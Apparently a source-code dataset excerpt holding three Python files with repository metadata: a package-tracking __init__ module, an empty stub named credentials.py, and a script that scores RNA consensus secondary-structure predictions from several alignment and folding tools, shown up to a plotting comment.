4eb3c4ffcdee60171c012106c27face68bef534a | 136 | py | Python | packagetrack/__init__.py | idm2114/packagetrack | 94e88b17ea6e909f77c26d5bfb94cea6adf32d83 | [
"MIT"
] | null | null | null | packagetrack/__init__.py | idm2114/packagetrack | 94e88b17ea6e909f77c26d5bfb94cea6adf32d83 | [
"MIT"
] | null | null | null | packagetrack/__init__.py | idm2114/packagetrack | 94e88b17ea6e909f77c26d5bfb94cea6adf32d83 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#author: ian macleod
import packagetrack.getemails
import packagetrack.inputPackage
import packagetrack.tracker
| 17 | 32 | 0.830882 | 16 | 136 | 7.0625 | 0.75 | 0.477876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095588 | 136 | 7 | 33 | 19.428571 | 0.918699 | 0.286765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
14cbb8dc69c8c116618b6cfdff9d04ade8794e10 | 62 | py | Python | appium_maya/resources/credentials.py | shuvoprime/Android-Automation | 0f4839edfe611551913f5a8eac8aa357de54d571 | [
"MIT"
] | null | null | null | appium_maya/resources/credentials.py | shuvoprime/Android-Automation | 0f4839edfe611551913f5a8eac8aa357de54d571 | [
"MIT"
] | null | null | null | appium_maya/resources/credentials.py | shuvoprime/Android-Automation | 0f4839edfe611551913f5a8eac8aa357de54d571 | [
"MIT"
] | null | null | null | import random
import string
class Constantinope:
pass | 12.4 | 21 | 0.741935 | 7 | 62 | 6.571429 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.241935 | 62 | 5 | 22 | 12.4 | 0.978723 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
14d5552e38e254e39f6187faf0c293adef786325 | 58,697 | py | Python | scripts/get_stats_of_css_estimation_programs.py | heartsh/phyloalifold | e03b73879c61f147a8c536251b82bac43a45ab77 | [
"MIT"
] | 1 | 2021-11-05T07:26:29.000Z | 2021-11-05T07:26:29.000Z | scripts/get_stats_of_css_estimation_programs.py | heartsh/consalifold | c64c3467b92a2084234208a091841a4c0e06da12 | [
"MIT"
] | null | null | null | scripts/get_stats_of_css_estimation_programs.py | heartsh/consalifold | c64c3467b92a2084234208a091841a4c0e06da12 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
import utils
from Bio import SeqIO
import seaborn
from matplotlib import pyplot
import os
import math
from math import sqrt
import multiprocessing
import numpy
seaborn.set()
pyplot.rcParams['legend.handlelength'] = 0
pyplot.rcParams['legend.fontsize'] = "large"
color_palette = seaborn.color_palette()
min_gamma = -4
max_gamma = 10
white = "#F2F2F2"
bracket_pairs = [("(", ")"), ("<", ">"), ("{", "}"), ("[", "]"), ("A", "a"), ("B", "b"), ("C", "c"), ("D", "d"), ("E", "e"), ]
def main():
(current_work_dir_path, asset_dir_path, program_dir_path, conda_program_dir_path) = utils.get_dir_paths()
num_of_threads = multiprocessing.cpu_count()
mafft_plus_consalifold_ppvs = []
mafft_plus_consalifold_senss = []
mafft_plus_consalifold_fprs = []
mafft_plus_consalifold_f1_scores = []
mafft_plus_consalifold_mccs = []
probcons_plus_consalifold_ppvs = []
probcons_plus_consalifold_senss = []
probcons_plus_consalifold_fprs = []
probcons_plus_consalifold_f1_scores = []
probcons_plus_consalifold_mccs = []
clustalw_plus_consalifold_ppvs = []
clustalw_plus_consalifold_senss = []
clustalw_plus_consalifold_fprs = []
clustalw_plus_consalifold_f1_scores = []
clustalw_plus_consalifold_mccs = []
mafft_xinsi_plus_consalifold_ppvs = []
mafft_xinsi_plus_consalifold_senss = []
mafft_xinsi_plus_consalifold_fprs = []
mafft_xinsi_plus_consalifold_f1_scores = []
mafft_xinsi_plus_consalifold_mccs = []
ref_sa_plus_consalifold_ppvs = []
ref_sa_plus_consalifold_senss = []
ref_sa_plus_consalifold_fprs = []
ref_sa_plus_consalifold_f1_scores = []
ref_sa_plus_consalifold_mccs = []
mafft_plus_centroidalifold_ppvs = []
mafft_plus_centroidalifold_senss = []
mafft_plus_centroidalifold_fprs = []
mafft_plus_centroidalifold_f1_scores = []
mafft_plus_centroidalifold_mccs = []
probcons_plus_centroidalifold_ppvs = []
probcons_plus_centroidalifold_senss = []
probcons_plus_centroidalifold_fprs = []
probcons_plus_centroidalifold_f1_scores = []
probcons_plus_centroidalifold_mccs = []
clustalw_plus_centroidalifold_ppvs = []
clustalw_plus_centroidalifold_senss = []
clustalw_plus_centroidalifold_fprs = []
clustalw_plus_centroidalifold_f1_scores = []
clustalw_plus_centroidalifold_mccs = []
mafft_xinsi_plus_centroidalifold_ppvs = []
mafft_xinsi_plus_centroidalifold_senss = []
mafft_xinsi_plus_centroidalifold_fprs = []
mafft_xinsi_plus_centroidalifold_f1_scores = []
mafft_xinsi_plus_centroidalifold_mccs = []
ref_sa_plus_centroidalifold_ppvs = []
ref_sa_plus_centroidalifold_senss = []
ref_sa_plus_centroidalifold_fprs = []
ref_sa_plus_centroidalifold_f1_scores = []
ref_sa_plus_centroidalifold_mccs = []
mafft_plus_petfold_ppvs = []
mafft_plus_petfold_senss = []
mafft_plus_petfold_fprs = []
mafft_plus_petfold_f1_scores = []
mafft_plus_petfold_mccs = []
probcons_plus_petfold_ppvs = []
probcons_plus_petfold_senss = []
probcons_plus_petfold_fprs = []
probcons_plus_petfold_f1_scores = []
probcons_plus_petfold_mccs = []
clustalw_plus_petfold_ppvs = []
clustalw_plus_petfold_senss = []
clustalw_plus_petfold_fprs = []
clustalw_plus_petfold_f1_scores = []
clustalw_plus_petfold_mccs = []
mafft_xinsi_plus_petfold_ppvs = []
mafft_xinsi_plus_petfold_senss = []
mafft_xinsi_plus_petfold_fprs = []
mafft_xinsi_plus_petfold_f1_scores = []
mafft_xinsi_plus_petfold_mccs = []
ref_sa_plus_petfold_ppvs = []
ref_sa_plus_petfold_senss = []
ref_sa_plus_petfold_fprs = []
ref_sa_plus_petfold_f1_scores = []
ref_sa_plus_petfold_mccs = []
mafft_plus_rnaalifold_ppv = mafft_plus_rnaalifold_sens = mafft_plus_rnaalifold_fpr = mafft_plus_rnaalifold_f1_score = mafft_plus_rnaalifold_mcc = 0.
probcons_plus_rnaalifold_ppv = probcons_plus_rnaalifold_sens = probcons_plus_rnaalifold_fpr = probcons_plus_rnaalifold_f1_score = probcons_plus_rnaalifold_mcc = 0.
clustalw_plus_rnaalifold_ppv = clustalw_plus_rnaalifold_sens = clustalw_plus_rnaalifold_fpr = clustalw_plus_rnaalifold_f1_score = clustalw_plus_rnaalifold_mcc = 0.
mafft_xinsi_plus_rnaalifold_ppv = mafft_xinsi_plus_rnaalifold_sens = mafft_xinsi_plus_rnaalifold_fpr = mafft_xinsi_plus_rnaalifold_f1_score = mafft_xinsi_plus_rnaalifold_mcc = 0.
ref_sa_plus_rnaalifold_ppv = ref_sa_plus_rnaalifold_sens = ref_sa_plus_rnaalifold_fpr = ref_sa_plus_rnaalifold_f1_score = ref_sa_plus_rnaalifold_mcc = 0.
centroidhomfold_ppvs = []
centroidhomfold_senss = []
centroidhomfold_fprs = []
centroidhomfold_f1_scores = []
centroidhomfold_mccs = []
locarna_ppv = locarna_sens = locarna_fpr = locarna_f1_score = locarna_mcc = 0.
raf_ppv = raf_sens = raf_fpr = raf_f1_score = raf_mcc = 0.
turbofold_ppvs = []
turbofold_senss = []
turbofold_fprs = []
turbofold_f1_scores = []
turbofold_mccs = []
gammas = [2. ** i for i in range(min_gamma, max_gamma + 1)]
rna_fam_dir_path = asset_dir_path + "/compiled_rna_fams_test"
ref_sa_dir_path = asset_dir_path + "/ref_sas_test"
mafft_plus_consalifold_css_dir_path = asset_dir_path + "/mafft_plus_consalifold"
probcons_plus_consalifold_css_dir_path = asset_dir_path + "/probcons_plus_consalifold"
clustalw_plus_consalifold_css_dir_path = asset_dir_path + "/clustalw_plus_consalifold"
mafft_xinsi_plus_consalifold_css_dir_path = asset_dir_path + "/mafft_xinsi_plus_consalifold"
ref_sa_plus_consalifold_css_dir_path = asset_dir_path + "/ref_sa_plus_consalifold"
mafft_plus_centroidalifold_css_dir_path = asset_dir_path + "/mafft_plus_centroidalifold"
probcons_plus_centroidalifold_css_dir_path = asset_dir_path + "/probcons_plus_centroidalifold"
clustalw_plus_centroidalifold_css_dir_path = asset_dir_path + "/clustalw_plus_centroidalifold"
mafft_xinsi_plus_centroidalifold_css_dir_path = asset_dir_path + "/mafft_xinsi_plus_centroidalifold"
ref_sa_plus_centroidalifold_css_dir_path = asset_dir_path + "/ref_sa_plus_centroidalifold"
mafft_plus_rnaalifold_css_dir_path = asset_dir_path + "/mafft_plus_rnaalifold"
probcons_plus_rnaalifold_css_dir_path = asset_dir_path + "/probcons_plus_rnaalifold"
clustalw_plus_rnaalifold_css_dir_path = asset_dir_path + "/clustalw_plus_rnaalifold"
mafft_xinsi_plus_rnaalifold_css_dir_path = asset_dir_path + "/mafft_xinsi_plus_rnaalifold"
ref_sa_plus_rnaalifold_css_dir_path = asset_dir_path + "/ref_sa_plus_rnaalifold"
mafft_plus_petfold_css_dir_path = asset_dir_path + "/mafft_plus_petfold"
probcons_plus_petfold_css_dir_path = asset_dir_path + "/probcons_plus_petfold"
clustalw_plus_petfold_css_dir_path = asset_dir_path + "/clustalw_plus_petfold"
mafft_xinsi_plus_petfold_css_dir_path = asset_dir_path + "/mafft_xinsi_plus_petfold"
ref_sa_plus_petfold_css_dir_path = asset_dir_path + "/ref_sa_plus_petfold"
centroidhomfold_ss_dir_path = asset_dir_path + "/centroidhomfold"
locarna_css_dir_path = asset_dir_path + "/locarna"
raf_css_dir_path = asset_dir_path + "/raf"
turbofold_ss_dir_path = asset_dir_path + "/turbofold"
pool = multiprocessing.Pool(num_of_threads)
for gamma in gammas:
mafft_plus_consalifold_count_params = []
clustalw_plus_consalifold_count_params = []
mafft_xinsi_plus_consalifold_count_params = []
ref_sa_plus_consalifold_count_params = []
probcons_plus_consalifold_count_params = []
mafft_plus_centroidalifold_count_params = []
probcons_plus_centroidalifold_count_params = []
clustalw_plus_centroidalifold_count_params = []
mafft_xinsi_plus_centroidalifold_count_params = []
ref_sa_plus_centroidalifold_count_params = []
mafft_plus_petfold_count_params = []
probcons_plus_petfold_count_params = []
clustalw_plus_petfold_count_params = []
mafft_xinsi_plus_petfold_count_params = []
ref_sa_plus_petfold_count_params = []
mafft_plus_rnaalifold_count_params = []
probcons_plus_rnaalifold_count_params = []
clustalw_plus_rnaalifold_count_params = []
mafft_xinsi_plus_rnaalifold_count_params = []
ref_sa_plus_rnaalifold_count_params = []
centroidhomfold_count_params = []
locarna_count_params = []
raf_count_params = []
turbofold_count_params = []
gamma_str = str(gamma) if gamma < 1 else str(int(gamma))
for rna_fam_file in os.listdir(rna_fam_dir_path):
if not rna_fam_file.endswith(".fa"):
continue
rna_seq_file_path = os.path.join(rna_fam_dir_path, rna_fam_file)
rna_seq_lens = [len(rna_seq.seq) for rna_seq in SeqIO.parse(rna_seq_file_path, "fasta")]
num_of_rnas = len(rna_seq_lens)
(rna_fam_name, extension) = os.path.splitext(rna_fam_file)
ref_css_file_path = os.path.join(ref_sa_dir_path, rna_fam_name + ".sth")
ref_css = utils.get_css(ref_css_file_path)
mafft_plus_consalifold_estimated_css_dir_path = os.path.join(mafft_plus_consalifold_css_dir_path, rna_fam_name)
probcons_plus_consalifold_estimated_css_dir_path = os.path.join(probcons_plus_consalifold_css_dir_path, rna_fam_name)
clustalw_plus_consalifold_estimated_css_dir_path = os.path.join(clustalw_plus_consalifold_css_dir_path, rna_fam_name)
mafft_xinsi_plus_consalifold_estimated_css_dir_path = os.path.join(mafft_xinsi_plus_consalifold_css_dir_path, rna_fam_name)
ref_sa_plus_consalifold_estimated_css_dir_path = os.path.join(ref_sa_plus_consalifold_css_dir_path, rna_fam_name)
mafft_plus_centroidalifold_estimated_css_dir_path = os.path.join(mafft_plus_centroidalifold_css_dir_path, rna_fam_name)
probcons_plus_centroidalifold_estimated_css_dir_path = os.path.join(probcons_plus_centroidalifold_css_dir_path, rna_fam_name)
clustalw_plus_centroidalifold_estimated_css_dir_path = os.path.join(clustalw_plus_centroidalifold_css_dir_path, rna_fam_name)
mafft_xinsi_plus_centroidalifold_estimated_css_dir_path = os.path.join(mafft_xinsi_plus_centroidalifold_css_dir_path, rna_fam_name)
ref_sa_plus_centroidalifold_estimated_css_dir_path = os.path.join(ref_sa_plus_centroidalifold_css_dir_path, rna_fam_name)
mafft_plus_petfold_estimated_css_dir_path = os.path.join(mafft_plus_petfold_css_dir_path, rna_fam_name)
probcons_plus_petfold_estimated_css_dir_path = os.path.join(probcons_plus_petfold_css_dir_path, rna_fam_name)
clustalw_plus_petfold_estimated_css_dir_path = os.path.join(clustalw_plus_petfold_css_dir_path, rna_fam_name)
mafft_xinsi_plus_petfold_estimated_css_dir_path = os.path.join(mafft_xinsi_plus_petfold_css_dir_path, rna_fam_name)
ref_sa_plus_petfold_estimated_css_dir_path = os.path.join(ref_sa_plus_petfold_css_dir_path, rna_fam_name)
centroidhomfold_estimated_ss_dir_path = os.path.join(centroidhomfold_ss_dir_path, rna_fam_name)
turbofold_estimated_ss_dir_path = os.path.join(turbofold_ss_dir_path, rna_fam_name)
mafft_plus_consalifold_estimated_css_file_path = os.path.join(mafft_plus_consalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(mafft_plus_consalifold_estimated_css_file_path)
mafft_plus_consalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
probcons_plus_consalifold_estimated_css_file_path = os.path.join(probcons_plus_consalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(probcons_plus_consalifold_estimated_css_file_path)
probcons_plus_consalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
clustalw_plus_consalifold_estimated_css_file_path = os.path.join(clustalw_plus_consalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(clustalw_plus_consalifold_estimated_css_file_path)
clustalw_plus_consalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
mafft_xinsi_plus_consalifold_estimated_css_file_path = os.path.join(mafft_xinsi_plus_consalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(mafft_xinsi_plus_consalifold_estimated_css_file_path)
mafft_xinsi_plus_consalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
ref_sa_plus_consalifold_estimated_css_file_path = os.path.join(ref_sa_plus_consalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(ref_sa_plus_consalifold_estimated_css_file_path)
ref_sa_plus_consalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
mafft_plus_centroidalifold_estimated_css_file_path = os.path.join(mafft_plus_centroidalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(mafft_plus_centroidalifold_estimated_css_file_path)
mafft_plus_centroidalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
probcons_plus_centroidalifold_estimated_css_file_path = os.path.join(probcons_plus_centroidalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(probcons_plus_centroidalifold_estimated_css_file_path)
probcons_plus_centroidalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
clustalw_plus_centroidalifold_estimated_css_file_path = os.path.join(clustalw_plus_centroidalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(clustalw_plus_centroidalifold_estimated_css_file_path)
clustalw_plus_centroidalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
mafft_xinsi_plus_centroidalifold_estimated_css_file_path = os.path.join(mafft_xinsi_plus_centroidalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(mafft_xinsi_plus_centroidalifold_estimated_css_file_path)
mafft_xinsi_plus_centroidalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
ref_sa_plus_centroidalifold_estimated_css_file_path = os.path.join(ref_sa_plus_centroidalifold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(ref_sa_plus_centroidalifold_estimated_css_file_path)
ref_sa_plus_centroidalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
mafft_plus_petfold_estimated_css_file_path = os.path.join(mafft_plus_petfold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(mafft_plus_petfold_estimated_css_file_path)
mafft_plus_petfold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
probcons_plus_petfold_estimated_css_file_path = os.path.join(probcons_plus_petfold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(probcons_plus_petfold_estimated_css_file_path)
probcons_plus_petfold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
clustalw_plus_petfold_estimated_css_file_path = os.path.join(clustalw_plus_petfold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(clustalw_plus_petfold_estimated_css_file_path)
clustalw_plus_petfold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
mafft_xinsi_plus_petfold_estimated_css_file_path = os.path.join(mafft_xinsi_plus_petfold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(mafft_xinsi_plus_petfold_estimated_css_file_path)
mafft_xinsi_plus_petfold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
ref_sa_plus_petfold_estimated_css_file_path = os.path.join(ref_sa_plus_petfold_estimated_css_dir_path, "gamma=" + gamma_str + ".sth")
estimated_css = utils.get_css(ref_sa_plus_petfold_estimated_css_file_path)
ref_sa_plus_petfold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
centroidhomfold_estimated_ss_file_path = os.path.join(centroidhomfold_estimated_ss_dir_path, "gamma=" + gamma_str + ".fa")
estimated_sss = get_sss(centroidhomfold_estimated_ss_file_path)
centroidhomfold_count_params.insert(0, (rna_seq_lens, estimated_sss, ref_css))
if gamma == 1.:
mafft_plus_rnaalifold_estimated_css_file_path = os.path.join(mafft_plus_rnaalifold_css_dir_path, rna_fam_name + ".sth")
estimated_css = utils.get_css(mafft_plus_rnaalifold_estimated_css_file_path)
mafft_plus_rnaalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
probcons_plus_rnaalifold_estimated_css_file_path = os.path.join(probcons_plus_rnaalifold_css_dir_path, rna_fam_name + ".sth")
estimated_css = utils.get_css(probcons_plus_rnaalifold_estimated_css_file_path)
probcons_plus_rnaalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
clustalw_plus_rnaalifold_estimated_css_file_path = os.path.join(clustalw_plus_rnaalifold_css_dir_path, rna_fam_name + ".sth")
estimated_css = utils.get_css(clustalw_plus_rnaalifold_estimated_css_file_path)
clustalw_plus_rnaalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
mafft_xinsi_plus_rnaalifold_estimated_css_file_path = os.path.join(mafft_xinsi_plus_rnaalifold_css_dir_path, rna_fam_name + ".sth")
estimated_css = utils.get_css(mafft_xinsi_plus_rnaalifold_estimated_css_file_path)
mafft_xinsi_plus_rnaalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
ref_sa_plus_rnaalifold_estimated_css_file_path = os.path.join(ref_sa_plus_rnaalifold_css_dir_path, rna_fam_name + ".sth")
estimated_css = utils.get_css(ref_sa_plus_rnaalifold_estimated_css_file_path)
ref_sa_plus_rnaalifold_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
locarna_estimated_css_file_path = os.path.join(locarna_css_dir_path, rna_fam_name + "/results/result.stk")
estimated_css = utils.get_css(locarna_estimated_css_file_path)
locarna_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
raf_estimated_css_file_path = os.path.join(raf_css_dir_path, rna_fam_name + ".sth")
estimated_css = utils.get_css(raf_estimated_css_file_path)
raf_count_params.insert(0, (rna_seq_lens, estimated_css, ref_css))
turbofold_estimated_ss_file_path = os.path.join(turbofold_estimated_ss_dir_path, "gamma=" + gamma_str + ".fa")
estimated_sss = get_sss(turbofold_estimated_ss_file_path)
turbofold_count_params.insert(0, (rna_seq_lens, estimated_sss, ref_css))
results = pool.map(get_bin_counts, mafft_plus_consalifold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
mafft_plus_consalifold_ppvs.insert(0, ppv)
mafft_plus_consalifold_senss.insert(0, sens)
mafft_plus_consalifold_fprs.insert(0, fpr)
mafft_plus_consalifold_f1_scores.append(f1_score)
mafft_plus_consalifold_mccs.append(mcc)
results = pool.map(get_bin_counts, probcons_plus_consalifold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
probcons_plus_consalifold_ppvs.insert(0, ppv)
probcons_plus_consalifold_senss.insert(0, sens)
probcons_plus_consalifold_fprs.insert(0, fpr)
probcons_plus_consalifold_f1_scores.append(f1_score)
probcons_plus_consalifold_mccs.append(mcc)
results = pool.map(get_bin_counts, clustalw_plus_consalifold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
clustalw_plus_consalifold_ppvs.insert(0, ppv)
clustalw_plus_consalifold_senss.insert(0, sens)
clustalw_plus_consalifold_fprs.insert(0, fpr)
clustalw_plus_consalifold_f1_scores.append(f1_score)
clustalw_plus_consalifold_mccs.append(mcc)
results = pool.map(get_bin_counts, mafft_xinsi_plus_consalifold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
mafft_xinsi_plus_consalifold_ppvs.insert(0, ppv)
mafft_xinsi_plus_consalifold_senss.insert(0, sens)
mafft_xinsi_plus_consalifold_fprs.insert(0, fpr)
mafft_xinsi_plus_consalifold_f1_scores.append(f1_score)
mafft_xinsi_plus_consalifold_mccs.append(mcc)
results = pool.map(get_bin_counts, ref_sa_plus_consalifold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
ref_sa_plus_consalifold_ppvs.insert(0, ppv)
ref_sa_plus_consalifold_senss.insert(0, sens)
ref_sa_plus_consalifold_fprs.insert(0, fpr)
ref_sa_plus_consalifold_f1_scores.append(f1_score)
ref_sa_plus_consalifold_mccs.append(mcc)
results = pool.map(get_bin_counts, mafft_plus_centroidalifold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
mafft_plus_centroidalifold_ppvs.insert(0, ppv)
mafft_plus_centroidalifold_senss.insert(0, sens)
mafft_plus_centroidalifold_fprs.insert(0, fpr)
mafft_plus_centroidalifold_f1_scores.append(f1_score)
mafft_plus_centroidalifold_mccs.append(mcc)
results = pool.map(get_bin_counts, probcons_plus_centroidalifold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
probcons_plus_centroidalifold_ppvs.insert(0, ppv)
probcons_plus_centroidalifold_senss.insert(0, sens)
probcons_plus_centroidalifold_fprs.insert(0, fpr)
probcons_plus_centroidalifold_f1_scores.append(f1_score)
probcons_plus_centroidalifold_mccs.append(mcc)
results = pool.map(get_bin_counts, clustalw_plus_centroidalifold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
clustalw_plus_centroidalifold_ppvs.insert(0, ppv)
clustalw_plus_centroidalifold_senss.insert(0, sens)
clustalw_plus_centroidalifold_fprs.insert(0, fpr)
clustalw_plus_centroidalifold_f1_scores.append(f1_score)
clustalw_plus_centroidalifold_mccs.append(mcc)
results = pool.map(get_bin_counts, mafft_xinsi_plus_centroidalifold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
mafft_xinsi_plus_centroidalifold_ppvs.insert(0, ppv)
mafft_xinsi_plus_centroidalifold_senss.insert(0, sens)
mafft_xinsi_plus_centroidalifold_fprs.insert(0, fpr)
mafft_xinsi_plus_centroidalifold_f1_scores.append(f1_score)
mafft_xinsi_plus_centroidalifold_mccs.append(mcc)
results = pool.map(get_bin_counts, ref_sa_plus_centroidalifold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
ref_sa_plus_centroidalifold_ppvs.insert(0, ppv)
ref_sa_plus_centroidalifold_senss.insert(0, sens)
ref_sa_plus_centroidalifold_fprs.insert(0, fpr)
ref_sa_plus_centroidalifold_f1_scores.append(f1_score)
ref_sa_plus_centroidalifold_mccs.append(mcc)
results = pool.map(get_bin_counts, mafft_plus_petfold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
mafft_plus_petfold_ppvs.insert(0, ppv)
mafft_plus_petfold_senss.insert(0, sens)
mafft_plus_petfold_fprs.insert(0, fpr)
mafft_plus_petfold_f1_scores.append(f1_score)
mafft_plus_petfold_mccs.append(mcc)
results = pool.map(get_bin_counts, probcons_plus_petfold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
probcons_plus_petfold_ppvs.insert(0, ppv)
probcons_plus_petfold_senss.insert(0, sens)
probcons_plus_petfold_fprs.insert(0, fpr)
probcons_plus_petfold_f1_scores.append(f1_score)
probcons_plus_petfold_mccs.append(mcc)
results = pool.map(get_bin_counts, clustalw_plus_petfold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
clustalw_plus_petfold_ppvs.insert(0, ppv)
clustalw_plus_petfold_senss.insert(0, sens)
clustalw_plus_petfold_fprs.insert(0, fpr)
clustalw_plus_petfold_f1_scores.append(f1_score)
clustalw_plus_petfold_mccs.append(mcc)
results = pool.map(get_bin_counts, mafft_xinsi_plus_petfold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
mafft_xinsi_plus_petfold_ppvs.insert(0, ppv)
mafft_xinsi_plus_petfold_senss.insert(0, sens)
mafft_xinsi_plus_petfold_fprs.insert(0, fpr)
mafft_xinsi_plus_petfold_f1_scores.append(f1_score)
mafft_xinsi_plus_petfold_mccs.append(mcc)
results = pool.map(get_bin_counts, ref_sa_plus_petfold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
ref_sa_plus_petfold_ppvs.insert(0, ppv)
ref_sa_plus_petfold_senss.insert(0, sens)
ref_sa_plus_petfold_fprs.insert(0, fpr)
ref_sa_plus_petfold_f1_scores.append(f1_score)
ref_sa_plus_petfold_mccs.append(mcc)
results = pool.map(get_bin_counts, centroidhomfold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
centroidhomfold_ppvs.insert(0, ppv)
centroidhomfold_senss.insert(0, sens)
centroidhomfold_fprs.insert(0, fpr)
centroidhomfold_f1_scores.append(f1_score)
centroidhomfold_mccs.append(mcc)
if gamma == 1.:
results = pool.map(get_bin_counts, mafft_plus_rnaalifold_count_params)
mafft_plus_rnaalifold_ppv, mafft_plus_rnaalifold_sens, mafft_plus_rnaalifold_fpr, mafft_plus_rnaalifold_f1_score, mafft_plus_rnaalifold_mcc = get_metrics(final_sum(results))
results = pool.map(get_bin_counts, probcons_plus_rnaalifold_count_params)
probcons_plus_rnaalifold_ppv, probcons_plus_rnaalifold_sens, probcons_plus_rnaalifold_fpr, probcons_plus_rnaalifold_f1_score, probcons_plus_rnaalifold_mcc = get_metrics(final_sum(results))
results = pool.map(get_bin_counts, clustalw_plus_rnaalifold_count_params)
clustalw_plus_rnaalifold_ppv, clustalw_plus_rnaalifold_sens, clustalw_plus_rnaalifold_fpr, clustalw_plus_rnaalifold_f1_score, clustalw_plus_rnaalifold_mcc = get_metrics(final_sum(results))
results = pool.map(get_bin_counts, mafft_xinsi_plus_rnaalifold_count_params)
mafft_xinsi_plus_rnaalifold_ppv, mafft_xinsi_plus_rnaalifold_sens, mafft_xinsi_plus_rnaalifold_fpr, mafft_xinsi_plus_rnaalifold_f1_score, mafft_xinsi_plus_rnaalifold_mcc = get_metrics(final_sum(results))
results = pool.map(get_bin_counts, ref_sa_plus_rnaalifold_count_params)
ref_sa_plus_rnaalifold_ppv, ref_sa_plus_rnaalifold_sens, ref_sa_plus_rnaalifold_fpr, ref_sa_plus_rnaalifold_f1_score, ref_sa_plus_rnaalifold_mcc = get_metrics(final_sum(results))
results = pool.map(get_bin_counts, locarna_count_params)
locarna_ppv, locarna_sens, locarna_fpr, locarna_f1_score, locarna_mcc = get_metrics(final_sum(results))
results = pool.map(get_bin_counts, raf_count_params)
raf_ppv, raf_sens, raf_fpr, raf_f1_score, raf_mcc = get_metrics(final_sum(results))
results = pool.map(get_bin_counts, turbofold_count_params)
ppv, sens, fpr, f1_score, mcc = get_metrics(final_sum(results))
turbofold_ppvs.insert(0, ppv)
turbofold_senss.insert(0, sens)
turbofold_fprs.insert(0, fpr)
turbofold_f1_scores.append(f1_score)
turbofold_mccs.append(mcc)
# Figure for ProbCons.
